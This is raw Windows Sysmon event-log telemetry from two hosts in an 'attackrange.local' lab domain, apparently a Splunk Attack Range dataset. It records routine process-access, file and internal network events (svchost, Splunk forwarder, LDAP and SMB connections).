07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047733Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047732Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047731Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047730Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047729Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047728Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047727Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047726Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047725Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047724Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047723Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047722Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047721Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047720Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047719Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047718Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047717Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047716Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047715Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047714Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047713Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+c38a|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001047712Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:10.384{466BC892-02AF-60E8-0D00-00000000CF01}900920C:\Windows\system32\svchost.exe{466BC892-0669-60E8-7E03-00000000CF01}4628C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+436a1|c:\windows\system32\rpcss.dll+437d2|c:\windows\system32\rpcss.dll+43b0f|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000806973Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:11.751{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=65DFA741EA6202FE3216A30AEF799441,SHA256=19BE796AE484BDD499634789A2EA40FF9899762AC1FBCAFEA1E6D85604B9ACD7,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x80000000000000001047785Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:11.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=59046AA571F1CE41D74E57AB215C47FE,SHA256=8022473F02AF290F8151D95496A41861520358FDDECB6374A5DB7F6EA888AA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047784Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:11.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3AD06E4EAC0D495DBD5A01AC5D4D77E6,SHA256=D1E42C26BD0D5BE22E3499BEBEB41FF765CB2E109E6C8346E7317ECF6B046359,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047783Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:02.718{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50980-false10.0.1.12-8000- 23542300x8000000000000000806974Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:12.813{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C58A9C5AF7F772E4F09E2132DE4F8B89,SHA256=CD2D9AEA266F1A652443CADE697BA54F22D9ECD3E460D75D91E304C4B1822C4A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047791Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:49:12.839{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDF342E4DE7D406986348FA604E7043B,SHA256=987C2CC8C88447EDD07A2805B6245284AEC5CC2CB6D2958CC487ECF347B3A271,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047790Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.500{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50983-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 354300x80000000000000001047789Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.403{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-890.attackrange.local50982-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001047788Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.403{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50982-false10.0.1.14win-dc-890.attackrange.local389ldap 354300x80000000000000001047787Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.394{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50981-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 354300x80000000000000001047786Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.394{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exeNT 
AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50981-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local389ldap 23542300x80000000000000001047793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:13.853{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B371A8FC7516BA933DF65C4DB6374447,SHA256=3A407F5FD893CED8F31A9E1FF9B8CAF72039E4FD6A2DABD8F668415207445545,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806975Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:13.876{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2EDD54A412599494A84C06DC89F38AF,SHA256=A8D86877A6A62B50E8C3491E9549C3D84FE1C83AD57A225FC6C6610274E251EE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047792Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:04.500{466BC892-02AB-60E8-0100-00000000CF01}4SystemNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local50983-truefe80:0:0:0:dd0d:23d0:6a34:6621win-dc-890.attackrange.local445microsoft-ds 23542300x8000000000000000806976Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:14.903{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10293176F9F8289FDA1B29236C31D459,SHA256=B6044B1A0F0AFFECF0327912CED9F9F6039EC8995D7C79378BABADE2F06C238B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:49:14.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8444439E729FB854200F445BFF7B9CAA,SHA256=DE044BABD8251884A4A394E4F94400906637CCF9EEC0C481B010AAD9FFDE0F9E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806978Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:14.348{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57225-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000806977Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:49:15.919{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7FDA5D0158DA3044B86E0C04C2BD4026,SHA256=061DBB91F9080DF02D4293E0163FEF478C256F779B1D49EC495DF9AE71EC340F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 